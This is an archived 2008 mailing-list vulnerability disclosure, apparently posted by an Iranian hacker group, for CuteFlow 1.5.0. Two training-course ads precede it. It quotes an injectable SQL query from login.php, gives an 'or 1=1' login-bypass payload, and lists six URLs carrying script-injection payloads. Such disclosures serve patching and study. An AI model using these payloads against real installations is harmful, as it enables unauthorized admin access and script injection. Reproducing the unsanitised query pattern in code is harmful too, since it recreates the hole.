Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]

CuteFlow Version 1.5.0 Multiple Remote Vulnerabilities

Subject: CuteFlow Version 1.5.0 Multiple Remote Vulnerabilities
Date: 29 Mar 2008 14:21:16 -0000
             
########################################################################
             #                                                                  
    #
             #     CuteFlow Version 1.5.0 Multiple Remote Vulnerabilities       
    #
             #                      [sql injection & Xss]                       
                #
             
########################################################################

Virangar Security Team

www.virangar.org
www.virangar.net

--------
Discoverd By : hadihadi 

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all iranian hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) from emperor team :)

sql vuln code in login.php:

$query = "select * from cf_user where strPassword = '$strMd5Password' AND 
strUserId = '".$_REQUEST["UserId"]."'";

 -----------------------
 the login forme included in index.php you must login in index.php ;)
vuln:
login:admin ' or 1=1/*
password:whatever
-------------------------------------
and you can see xss vuln too here:

/page/showcirculation.php?language=<script>alert(1111)</script>
/pages/edittemplate_step2.php?language=<script>alert(1111)</script>
/pages/showfields.php?language=<script>alert(1111)</script>>
/pages/showuser.php?language=<script>alert(1111)</script>
/pages/editmailinglist_step1.php?language=<script>alert(222)</script>
/pages/showtemplates.php?language=<script>alert(1111)</script>
-------------------------
tnx all h4ck3rz

<Prev in Thread] Current Thread [Next in Thread>
  • CuteFlow Version 1.5.0 Multiple Remote Vulnerabilities, hadihadi_zedehal_2006 <=